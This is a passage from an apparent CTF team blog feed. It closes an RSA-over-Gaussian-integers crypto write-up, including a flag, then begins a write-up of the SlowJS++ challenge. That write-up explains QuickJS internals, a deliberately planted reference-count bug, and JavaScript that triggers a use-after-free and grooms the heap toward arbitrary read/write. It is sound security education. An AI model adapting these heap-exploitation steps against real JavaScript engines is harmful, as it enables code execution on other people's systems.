</span><span class="n">p</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">N</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">N</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">N</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">ciphertext</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">q</span> <span class="o">=</span> <span class="n">N</span> <span class="o">/</span> <span class="n">p</span>

<span class="c1"># calculate the value of d from p and q
</span><span class="n">p_norm</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">real</span><span class="o">*</span><span class="n">p</span><span class="p">.</span><span class="n">real</span> <span class="o">+</span> <span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="o">*</span><span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="p">)</span>
<span class="n">q_norm</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">real</span><span class="o">*</span><span class="n">q</span><span class="p">.</span><span class="n">real</span> <span class="o">+</span> <span class="n">q</span><span class="p">.</span><span class="n">imag</span><span class="o">*</span><span class="n">q</span><span class="p">.</span><span class="n">imag</span><span class="p">)</span>
<span class="n">tot</span> <span class="o">=</span> <span class="p">(</span><span class="n">p_norm</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q_norm</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
<span class="n">d</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">tot</span><span class="p">)</span>

<span class="c1"># decrypt our ciphertext 
</span><span class="n">m</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">d</span><span class="p">))</span>

<span class="c1"># decode the message
</span><span class="k">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">real</span><span class="p">))</span> <span class="o">+</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">int</span><span class="p">((</span><span class="n">m</span><span class="p">.</span><span class="n">imag</span><span class="p">))))</span>

</code></pre></div></div>
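
<p>The last few lines of the script compute $d$ from the norms of $p$ and $q$. The challenge’s <code class="language-plaintext highlighter-rouge">CRSA</code> module is not reproduced here, so the following is only a toy sketch in plain Python with stand-in helpers (<code class="language-plaintext highlighter-rouge">gmul</code> and <code class="language-plaintext highlighter-rouge">gpow</code> are hypothetical names). To keep the modular reduction trivial it assumes $p$ and $q$ are ordinary primes congruent to $3$ modulo $4$, which stay prime in the Gaussian integers and have norms $p^2$ and $q^2$. The real challenge uses genuinely complex primes.</p>

```python
def gmul(u, v, n):
    """Multiply two Gaussian integers (re, im) and reduce both parts mod n."""
    (a, b), (c, d) = u, v
    return ((a * c - b * d) % n, (a * d + b * c) % n)


def gpow(base, exp, n):
    """Square-and-multiply exponentiation of a Gaussian integer mod n."""
    result = (1, 0)
    while exp:
        if exp % 2:
            result = gmul(result, base, n)
        base = gmul(base, base, n)
        exp //= 2
    return result


p, q = 3, 7                      # toy primes, both 3 mod 4
n = p * q
tot = (p * p - 1) * (q * q - 1)  # (norm(p) - 1) * (norm(q) - 1)
e = 5
d = pow(e, -1, tot)              # needs Python 3.8+

message = (4, 11)                # 4 + 11i
cipher = gpow(message, e, n)
recovered = gpow(cipher, d, n)
print(recovered == message)      # True
```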

<h2 id="flage">Flage</h2>

<p><code class="language-plaintext highlighter-rouge">SDCTF{lll_15_k1ng_45879340409310}</code> Indeed it is king.</p>

<h2 id="final-thoughts">Final Thoughts</h2>

<p>This was a really hard challenge. I spent over 30 hours straight running in circles with various techniques like complex
LLL and Algebraic LLL. However, I did not solve this challenge by the end of the CTF. In fact, this challenge went
unsolved by anyone. After discussing with the author, I realized that one of my earlier ideas of converting the complex
integers to a real matrix to do LLL was actually the intended solution. However, I didn’t quite understand how to
complete the solve path, which required a canonical embedding. An embedding is similar to what we did when we used
different columns for the real and imaginary parts of the powers of $x$ and added the imaginary multiples.</p>

<p>I’m glad I was able to solve it regardless because it’s better late than never. More importantly, I hope that this guide
can give you some understanding of the complexities of the Coppersmith method often needed for RSA challenges. In
this vein, I have another section with resources I found useful for this challenge.</p>

<p>Finally, shoutout to 18lauey2 for making such a cool challenge.</p>

<h2 id="resources-to-help-my-dumb-dumb-brain">Resources to help my dumb dumb brain</h2>

<ul>
  <li>A bunch of lectures from Tanja Lange on Coppersmith and RSA as part of 2MMMC10 at Eindhoven University of Technology
  <a href="https://www.youtube.com/@tanjalangecryptology783/videos">https://www.youtube.com/@tanjalangecryptology783/videos</a></li>
  <li>The blog written by Cousin Wu Ka Lok from <code class="language-plaintext highlighter-rouge">blackb6a</code> <a href="https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea">https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea</a></li>
  <li>The paper the challenge was inspired by <a href="https://ia803007.us.archive.org/2/items/arxiv-1008.1284/1008.1284.pdf">Ideal forms of Coppersmith’s theorem and Guruswami-Sudan list decoding</a></li>
  <li>A wonderful paper that summarizes the various attacks on RSA. <a href="https://eprint.iacr.org/2020/1506.pdf">Recovering cryptographic keys from partial information, by example</a></li>
</ul>

<p>That’s all folks.</p>]]></content><author><name>hiswui</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[SDCTF 2024] SlowJS++</title><link href="https://maplebacon.org/2024/05/sdctf-slowjspp/" rel="alternate" type="text/html" title="[SDCTF 2024] SlowJS++" /><published>2024-05-15T00:00:00+00:00</published><updated>2024-05-15T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/sdctf-slowjspp</id><content type="html" xml:base="https://maplebacon.org/2024/05/sdctf-slowjspp/"><![CDATA[<p><strong>Summary</strong>: Exploiting UAF due to an incorrect decrement to the reference count of an object in QuickJS Javascript engine to gain arbitrary read/write and leaks and then using that to gain RCE.</p>

<h2 id="intro">Intro</h2>

<p>SlowJS++ was a Javascript engine exploitation challenge in SDCTF 2024, with only 2 solves during the competition. I could not solve it before the end of the CTF, but I kept working on the exploit and I finally solved it about 10 hours after the end.</p>

<p>We were given the challenge binary, which was a recent version of QuickJS Javascript engine compiled with debug info, and told that it was being hosted on Ubuntu 23.10 in the remote environment. I downloaded the libc, libm, and ld for Ubuntu 23.10 and patched the binary to use those. The challenge also had a hint that said we should bindiff the <code class="language-plaintext highlighter-rouge">async_func_resume</code> function.</p>

<h2 id="quickjs-internals">QuickJS Internals</h2>

<p>This challenge is about async functions and promises in Javascript. I found <a href="https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Asynchronous/Introducing">this</a>, <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Using_promises">this</a>, and <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise">this</a> very helpful in understanding the javascript concepts. Also, <a href="https://mem2019.github.io/jekyll/update/2021/09/27/TCTF2021-Promise.html">this writeup</a> was particularly helpful in understanding a bit more about QuickJS internals.</p>

<h3 id="1-jsvalue">1. JSValue</h3>

<p>QuickJS represents <code class="language-plaintext highlighter-rouge">JSValue</code>s as two qwords. The first one is the value (in case of int/double/etc.) or the pointer (for heap objects), and the second qword is a tag that shows the type of the first qword. The tags can be found <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.h#L67">here</a>. The negative tag values are for objects that are managed by the heap and the garbage collector. The zero and positive tags are for objects that are not allocated separately on the heap, and are represented with their direct value (such as int, double, undefined, etc.). You can look at the different structs used by QuickJS both by looking at the source code and by opening the challenge binary in gdb and using <code class="language-plaintext highlighter-rouge">ptype /ox &lt;struct name&gt;</code>.</p>
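
<p>When staring at raw memory dumps, a tiny decoder for this two-qword layout can help. The sketch below is plain Python and not part of the exploit. The tag numbers in <code class="language-plaintext highlighter-rouge">ASSUMED_TAG_NAMES</code> are an assumed subset written from memory, so check them against the linked header before relying on them.</p>

```python
# Assumed subset of the QuickJS tag enum; verify against quickjs.h.
ASSUMED_TAG_NAMES = {-7: "string", -1: "object", 0: "int", 7: "float64"}


def decode_jsvalue(raw):
    """Split 16 little-endian bytes into the payload qword and the signed tag qword."""
    payload = int.from_bytes(raw[0:8], "little")
    tag = int.from_bytes(raw[8:16], "little", signed=True)
    return {
        "payload": payload,
        "tag": tag,
        "heap_managed": tag < 0,  # negative tags are managed by the heap / GC
        "kind": ASSUMED_TAG_NAMES.get(tag, "unknown"),
    }


# A made-up heap pointer tagged as an object
raw = (0x55550000BEEF).to_bytes(8, "little") + (-1).to_bytes(8, "little", signed=True)
print(decode_jsvalue(raw))
```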

<h3 id="2-jsstring">2. JSString</h3>

<p>The <code class="language-plaintext highlighter-rouge">JSString</code> struct represents a string, and it can be inspected with <code class="language-plaintext highlighter-rouge">ptype /ox JSString</code> in gdb:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type = struct JSString {
/* 0x0000      |  0x0004 */    JSRefCountHeader header;
/* 0x0004: 0x0 |  0x0004 */    uint32_t len : 31;
/* 0x0007: 0x7 |  0x0001 */    uint8_t is_wide_char : 1;
/* 0x0008: 0x0 |  0x0004 */    uint32_t hash : 30;
/* 0x000b: 0x6 |  0x0001 */    uint8_t atom_type : 2;
/* 0x000c      |  0x0004 */    uint32_t hash_next;
/* 0x0010      |  0x0000 */    union {
/*                0x0000 */        uint8_t str8[0];
/*                0x0000 */        uint16_t str16[0];
                                   /* total size (bytes):    0 */
                               } u;
                               /* total size (bytes):   16 */
                             }
</code></pre></div></div>

<p>Basically, there’s some metadata, including the length of the string, in the first 16 bytes, and then from offset 16 the array of string bytes will start (<code class="language-plaintext highlighter-rouge">str8</code>). So, the content of the string is not stored in a separate buffer and is stored at the end of the <code class="language-plaintext highlighter-rouge">JSString</code> object itself.</p>
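
<p>Following the <code class="language-plaintext highlighter-rouge">ptype</code> output above, here is a small plain-Python sketch that parses a <code class="language-plaintext highlighter-rouge">JSString</code> out of raw bytes, for example from a leak. The function name is made up, and it assumes a little-endian target, that <code class="language-plaintext highlighter-rouge">len</code> counts characters rather than bytes, and that 8-bit strings are Latin-1.</p>

```python
def parse_jsstring(raw):
    """Decode (ref_count, length, is_wide_char, text) from a raw JSString."""
    ref_count = int.from_bytes(raw[0:4], "little", signed=True)
    len_word = int.from_bytes(raw[4:8], "little")
    length = len_word & 0x7FFFFFFF       # low 31 bits: len
    is_wide_char = bool(len_word >> 31)  # top bit: is_wide_char
    char_size = 2 if is_wide_char else 1
    data = raw[16:16 + length * char_size]  # characters start at offset 16
    text = data.decode("utf-16-le" if is_wide_char else "latin-1")
    return ref_count, length, is_wide_char, text


# ref_count = 1, len = 5, narrow string, hash fields zeroed
header = (1).to_bytes(4, "little") + (5).to_bytes(4, "little") + bytes(8)
print(parse_jsstring(header + b"hello"))  # (1, 5, False, 'hello')
```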

<h3 id="3-jsobject">3. JSObject</h3>

<p>The <code class="language-plaintext highlighter-rouge">JSObject</code> struct represents a generic javascript object in memory. You can see that each object has a gc header, and the first dword of the header is the reference count for the garbage collector. Another important thing about objects is their <code class="language-plaintext highlighter-rouge">class_id</code>, which shows the type of that object. Different class id values can be seen <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.c#L118">here</a>. <code class="language-plaintext highlighter-rouge">JSObject</code>s also have two fields called <code class="language-plaintext highlighter-rouge">shape</code> and <code class="language-plaintext highlighter-rouge">prop</code>. <code class="language-plaintext highlighter-rouge">shape</code> points to a <code class="language-plaintext highlighter-rouge">JSShape</code> struct that describes the shape of an object and the properties that it has (similar to a map in v8), and the <code class="language-plaintext highlighter-rouge">prop</code> field is a pointer to an array of <code class="language-plaintext highlighter-rouge">JSProperty</code> structs that each hold the data for one of the properties of our object.</p>

<p>Two important objects to learn about are <code class="language-plaintext highlighter-rouge">ArrayBuffer</code>s and <code class="language-plaintext highlighter-rouge">TypedArray</code>s:</p>

<ul>
  <li>
    <p>An <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> object is a <code class="language-plaintext highlighter-rouge">JSObject</code> that has a pointer to a <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> struct instance in its <code class="language-plaintext highlighter-rouge">obj.u.array_buffer</code> field. The <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> struct has a pointer to its backing storage memory (the actual data buffer) called <code class="language-plaintext highlighter-rouge">data</code> and a few other fields like the length.</p>
  </li>
  <li>
    <p>A <code class="language-plaintext highlighter-rouge">TypedArray</code> is a kind of array that allows the user to use an array buffer’s storage for different types. For example, a <code class="language-plaintext highlighter-rouge">Uint32Array</code> is a typed array that has an array buffer inside itself and uses that array buffer as an array of 32-bit integers. The important fields in a <code class="language-plaintext highlighter-rouge">JSObject</code> of a typed array are <code class="language-plaintext highlighter-rouge">obj.u.array.u1.typed_array</code>, <code class="language-plaintext highlighter-rouge">obj.u.array.u.ptr</code>, and <code class="language-plaintext highlighter-rouge">obj.u.array.count</code>. The <code class="language-plaintext highlighter-rouge">typed_array</code> field has a pointer to a <code class="language-plaintext highlighter-rouge">JSTypedArray</code> struct, which itself has a field called <code class="language-plaintext highlighter-rouge">obj</code> that points back at the <code class="language-plaintext highlighter-rouge">JSObject</code> of our typed array, and has another pointer called <code class="language-plaintext highlighter-rouge">buffer</code> that points to a <code class="language-plaintext highlighter-rouge">JSObject</code> representing the array buffer behind this typed array. The <code class="language-plaintext highlighter-rouge">ptr</code> and <code class="language-plaintext highlighter-rouge">count</code> fields in a typed array object represent the pointer to the backing storage of the array buffer behind this typed array (where the actual “data” is stored), and the length of the array. 
So, if <code class="language-plaintext highlighter-rouge">ta_obj</code> is the <code class="language-plaintext highlighter-rouge">JSObject</code> of our typed array, <code class="language-plaintext highlighter-rouge">ta_obj.u.array.u.ptr</code> and <code class="language-plaintext highlighter-rouge">ta_obj.u.array.u1.typed_array-&gt;buffer-&gt;u.array_buffer-&gt;data</code> both point to the backing storage memory of the array, but the first one is way more convenient so the <code class="language-plaintext highlighter-rouge">ptr</code> and <code class="language-plaintext highlighter-rouge">count</code> fields inside the typed array object itself are the ones that are used when accessing different indexes of the array. You can look at the source code of <code class="language-plaintext highlighter-rouge">JS_SetPropertyValue()</code> to see how this is done.</p>
  </li>
</ul>
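<p>The relationship between an array buffer and the typed arrays built on it can also be seen from the script side. The following is a minimal sketch in plain JavaScript (the names <code class="language-plaintext highlighter-rouge">buffer</code>, <code class="language-plaintext highlighter-rouge">viewA</code> and <code class="language-plaintext highlighter-rouge">viewB</code> are only illustrative): two typed arrays created over the same <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> read and write the same backing storage.</p>

<pre><code class="language-js">// Two typed arrays created over one ArrayBuffer share a single backing store.
const buffer = new ArrayBuffer(8);
const viewA = new Uint32Array(buffer);
const viewB = new Uint32Array(buffer);

// A write through one view is visible through the other.
viewA[0] = 0xdeadbeef;
console.log(viewB[0].toString(16));          // deadbeef

// Both views report the same underlying buffer object.
console.log(viewA.buffer === viewB.buffer);  // true
</code></pre>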

<p>Another important thing to note about array buffers and typed arrays is that the <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> and <code class="language-plaintext highlighter-rouge">JSTypedArray</code> structs each contain a <code class="language-plaintext highlighter-rouge">struct list_head</code> field whose <code class="language-plaintext highlighter-rouge">next</code> and <code class="language-plaintext highlighter-rouge">prev</code> pointers form a doubly linked list. This list connects an array buffer with all typed arrays that use it as their storage buffer. When an array buffer gets freed, the <code class="language-plaintext highlighter-rouge">js_array_buffer_finalizer</code> function
<a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.c#L53109">here</a> loops over all typed arrays that use this array buffer and sets their <code class="language-plaintext highlighter-rouge">count</code> field to zero. So, the approach from the TCTF 2021 writeup I mentioned earlier no longer works: if you cause a UAF on an array buffer, you can no longer use the typed arrays previously connected to it to read or write its freed backing storage, because their <code class="language-plaintext highlighter-rouge">count</code> field has been set to zero.</p>
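<p>To illustrate the effect of that finalizer loop, here is a toy model in JavaScript. It is not QuickJS code: the classes <code class="language-plaintext highlighter-rouge">ToyArrayBuffer</code> and <code class="language-plaintext highlighter-rouge">ToyTypedArray</code> and the function <code class="language-plaintext highlighter-rouge">toyFinalizeBuffer</code> are made up for this sketch, and a plain array stands in for the linked list.</p>

<pre><code class="language-js">// Toy model, not QuickJS code: a buffer remembers every view built on it.
class ToyArrayBuffer {
  constructor(byteLength) {
    this.data = new Array(byteLength).fill(0);
    this.views = [];                 // stands in for the list_head chain
  }
}

class ToyTypedArray {
  constructor(buffer, elementSize) {
    this.buffer = buffer;
    this.count = buffer.data.length / elementSize; // cached element count
    buffer.views.push(this);         // link the view to its buffer
  }
}

// Mirrors the idea of the finalizer: zero the count of every linked view
// so that no index of a stale view is considered in bounds any more.
function toyFinalizeBuffer(buffer) {
  for (const view of buffer.views) {
    view.count = 0;
  }
  buffer.data = null;
}

const toyBuf = new ToyArrayBuffer(16);
const toyView = new ToyTypedArray(toyBuf, 4);
console.log(toyView.count);  // 4
toyFinalizeBuffer(toyBuf);
console.log(toyView.count);  // 0
</code></pre>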

<h2 id="debugging">Debugging</h2>

<p>A debugging approach that was mentioned in the TCTF writeup by r3kapig was to use <code class="language-plaintext highlighter-rouge">Math.min(obj)</code> and break on the <code class="language-plaintext highlighter-rouge">js_math_min_max</code> function in gdb, and then inspect the pointer at <code class="language-plaintext highlighter-rouge">*$r8</code> or <code class="language-plaintext highlighter-rouge">argv-&gt;u.ptr</code> after hitting the breakpoint to find the address of <code class="language-plaintext highlighter-rouge">obj</code>. I also used this approach for debugging and it was really helpful.</p>

<h2 id="vulnerability">Vulnerability</h2>

<p>I downloaded the source for the latest version of QuickJS from https://github.com/bellard/quickjs/tree/d378a9f3a583cb787c390456e27276d0ee377d23 (the latest commit at the time of the CTF) and built an original QuickJS binary with debug info to get something comparable to the challenge binary. Opening both binaries in Ghidra and comparing the <code class="language-plaintext highlighter-rouge">async_func_resume</code> function shows that the challenge binary decrements the reference count of the object returned by an async function and, if that count reaches zero, frees the object with <code class="language-plaintext highlighter-rouge">__JS_FreeValueRT</code> (provided the object has a negative tag value, which means that it is managed by the gc). This is probably the inlined version of the <code class="language-plaintext highlighter-rouge">JS_FreeValueRT</code> function <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.h#L658">here</a>, which does the same thing. In other words, an object returned from an async function has its refcount decreased by 1 when it shouldn’t be. If we can drive the refcount of an object to zero and get it freed while our script still holds a reference to it, we get a use-after-free (UAF).</p>

<pre><code class="language-C">lVar3 = *(long *)(param_2 + 0xa0);
uVar4 = *(undefined8 *)(lVar3 + -8);
piVar5 = *(int **)(lVar3 + -0x10);
*(undefined (*) [16])(lVar3 + -0x10) = (undefined  [16])0x0;
*(undefined8 *)(lVar3 + -8) = 3;
// if the object has a negative tag (heap object) and (--refcount &lt;= 0):
if ((0xfffffff4 &lt; (uint)uVar4) &amp;&amp; (iVar1 = *piVar5, *piVar5 = iVar1 + -1, iVar1 + -1 &lt; 1)) {
  __JS_FreeValueRT(*(undefined8 *)(param_1 + 0x18),piVar5);	// free the object
}
</code></pre>
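<p>To make the consequence of that extra decrement concrete, here is a toy reference-counting model in JavaScript. It is only a sketch and not QuickJS code: <code class="language-plaintext highlighter-rouge">ToyValue</code>, <code class="language-plaintext highlighter-rouge">toyDup</code>, <code class="language-plaintext highlighter-rouge">toyFree</code>, <code class="language-plaintext highlighter-rouge">balancedReturn</code> and <code class="language-plaintext highlighter-rouge">patchedReturn</code> are hypothetical names, and the starting count of 1 is an assumption of the model.</p>

<pre><code class="language-js">// Toy model of reference counting, not QuickJS code.
class ToyValue {
  constructor() {
    this.refCount = 1;    // assumption: one reference, held by the script
    this.freed = false;
  }
}

function toyDup(value) {
  value.refCount += 1;
  return value;
}

function toyFree(value) {
  value.refCount -= 1;
  if (value.refCount === 0) {
    value.freed = true;   // the memory would go back to the allocator here
  }
}

// Balanced return path: the reference taken for the return value is released once.
function balancedReturn(value) {
  const returned = toyDup(value);
  toyFree(returned);
}

// Return path with one spurious extra release, like the patched binary.
function patchedReturn(value) {
  balancedReturn(value);
  toyFree(value);
}

const globalArr = new ToyValue();   // the script keeps using this reference
balancedReturn(globalArr);
console.log(globalArr.refCount, globalArr.freed);  // 1 false
patchedReturn(globalArr);
console.log(globalArr.refCount, globalArr.freed);  // 0 true
</code></pre>

<p>In this model a single patched return is enough to free the value while the script still refers to it. The real engine may hold additional references, so the number of returns needed before the count reaches zero can be larger.</p>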

<p>Using the <code class="language-plaintext highlighter-rouge">Math.min(obj)</code> debug approach to inspect the reference count of some objects after they’re created, you can see that their reference count is 1 more than the expected value. For example, an object with only 1 reference to it has a refcount of 2. The TCTF challenge writeup mentions this as well, and I don’t know the exact reason for it either. My guess is that the engine holds some additional internal reference to the object.</p>

<h2 id="getting-arbitrary-readwrite">Getting arbitrary read/write</h2>

<p>I wrote an async function <code class="language-plaintext highlighter-rouge">fn1()</code> that returns the object <code class="language-plaintext highlighter-rouge">arr</code>, where <code class="language-plaintext highlighter-rouge">arr</code> is a globally-defined <code class="language-plaintext highlighter-rouge">Uint32Array</code>. I expected that after calling <code class="language-plaintext highlighter-rouge">fn1()</code> once and returning from it, <code class="language-plaintext highlighter-rouge">arr</code> would be freed and the UAF triggered. However, for some reason we need to call it twice to get <code class="language-plaintext highlighter-rouge">arr</code> freed. I don’t clearly understand why; I found this through trial and error while playing around with the initial PoC code. Also, if the first <code class="language-plaintext highlighter-rouge">Math.min(arr)</code> call (between the <code class="language-plaintext highlighter-rouge">fn1()</code> calls; the one marked with <code class="language-plaintext highlighter-rouge">// ???</code>) was not there, <code class="language-plaintext highlighter-rouge">arr</code> somehow did not get freed. Once the exploit was complete, though, commenting out that <code class="language-plaintext highlighter-rouge">Math.min</code> call did not break it. I assume this has something to do with the garbage collector being invoked at different times in these situations, but I don’t understand this clearly either. The good news is that although the garbage collector and the general heap layout of the application are not very predictable and cause weird issues like this, they are deterministic: they won’t change between different runs of the same js code, so we can tweak things until the issues go away.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mh">0x140</span><span class="p">);</span>
<span class="p">...</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn1</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn1</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">arr</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nb">Math</span><span class="p">.</span><span class="nx">min</span><span class="p">(</span><span class="nx">arr</span><span class="p">)</span> <span class="c1">// ???</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="nb">Math</span><span class="p">.</span><span class="nx">min</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>	<span class="c1">// arr gets freed here, but we still have the reference to it.</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>

<p>Now if we break after the second <code class="language-plaintext highlighter-rouge">fn1()</code> call, we can see that <code class="language-plaintext highlighter-rouge">arr</code> is freed and sits in the malloc free lists. By inspecting the free lists (tcache/fastbins), we can see that we need to allocate a few more objects to bring <code class="language-plaintext highlighter-rouge">arr</code>’s freed memory to the top of the free lists. We use a for loop to perform these allocations. All <code class="language-plaintext highlighter-rouge">JSObject</code> structs are allocated using 0x50-sized chunks, so allocating new objects on the heap will use the same free list as <code class="language-plaintext highlighter-rouge">arr</code>’s <code class="language-plaintext highlighter-rouge">JSObject</code> chunk:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">objs</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The for loop allocates 6 new objects and pushes them into an array to keep references to them and prevent them from being freed. However, the number of iterations (6) is not always the same: it changes because other parts of the code have side effects on the heap layout and gc operations. I had to change this value from 6 to 7 and back several times during exploit development. You just have to look at the tcache/fastbins layout at the breakpoint before this code segment to determine the number of iterations of this loop.</p>

<p>Now we want to allocate another <code class="language-plaintext highlighter-rouge">Uint32Array</code>, but this time we want its <code class="language-plaintext highlighter-rouge">ptr</code> field (which points to the actual data storage memory for the array) to point to the same chunk of memory that used to hold the <code class="language-plaintext highlighter-rouge">JSObject</code> struct for <code class="language-plaintext highlighter-rouge">arr</code>. Since <code class="language-plaintext highlighter-rouge">JSObject</code> structs are allocated in 0x50-sized chunks, the data size of our new array must also cause the allocation of an 0x50-sized chunk. We therefore want our array’s data memory to have a size of 0x48 bytes, which means 18 4-byte integers, and define <code class="language-plaintext highlighter-rouge">uaf_arr</code> as:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">uaf_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>
</code></pre></div></div>
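<p>The size arithmetic can be checked with a small helper. This is a sketch that assumes the usual 64-bit glibc malloc rules (8 bytes of chunk header added to the request, 16-byte alignment, and a minimum chunk size of 0x20); the function name <code class="language-plaintext highlighter-rouge">chunkSizeFor</code> is hypothetical.</p>

<pre><code class="language-js">// Assumed 64-bit glibc rules: 8-byte size header, 16-byte alignment, 0x20 minimum.
function chunkSizeFor(requestBytes) {
  const withHeader = requestBytes + 8;
  const aligned = Math.ceil(withHeader / 16) * 16;
  return Math.max(aligned, 0x20);
}

// 18 elements of 4 bytes each give a 0x48-byte request, which lands in an 0x50 chunk.
const dataBytes = 18 * Uint32Array.BYTES_PER_ELEMENT;
console.log(dataBytes.toString(16));                // 48
console.log(chunkSizeFor(dataBytes).toString(16));  // 50
</code></pre>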

<p>The allocation of this new typed array causes 3 malloc calls that should return an 0x50-sized chunk. The first one is to host the <code class="language-plaintext highlighter-rouge">JSObject</code> of the <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> behind this typed array. The second one is to host the backing storage memory of the array (the one that we want to collide with <code class="language-plaintext highlighter-rouge">arr</code>’s object struct), and the third one is for the <code class="language-plaintext highlighter-rouge">JSObject</code> of the typed array itself. So, we want <code class="language-plaintext highlighter-rouge">arr</code>’s freed memory to be the second chunk from the beginning of tcache before we instantiate <code class="language-plaintext highlighter-rouge">uaf_arr</code> to ensure that <code class="language-plaintext highlighter-rouge">uaf_arr</code>’s data pointer points to it. We need to adjust the number of allocated objects in the previous for loop to meet this requirement. We can do a <code class="language-plaintext highlighter-rouge">Math.min(uaf_arr)</code> right after this line to break and see if everything went as we wanted. <code class="language-plaintext highlighter-rouge">uaf_arr</code>’s data pointer (<code class="language-plaintext highlighter-rouge">ptr</code> field) must point to the same memory that hosted <code class="language-plaintext highlighter-rouge">arr</code>’s <code class="language-plaintext highlighter-rouge">JSObject</code> struct.</p>
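<p>The ordering requirement can be pictured with a toy last-in-first-out free list. This is only a model of the 0x50 tcache bin, with made-up chunk names, and it assumes that the three allocations described above are the only ones served from that bin.</p>

<pre><code class="language-js">// Toy LIFO free list standing in for the 0x50 tcache bin.
// The head of the bin is the END of this array; chunk names are hypothetical.
const toyBin = ["chunk_c", "arr_jsobject", "chunk_a"];

function toyMalloc() {
  return toyBin.pop();   // tcache hands out the most recently freed chunk first
}

// The three 0x50-sized allocations, in the order described above.
const purposes = ["ArrayBuffer JSObject", "backing storage", "TypedArray JSObject"];
const placement = {};
for (const purpose of purposes) {
  placement[purpose] = toyMalloc();
}

// With arr's old chunk second from the head, the backing storage lands on it.
console.log(placement["backing storage"]);  // arr_jsobject
</code></pre>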

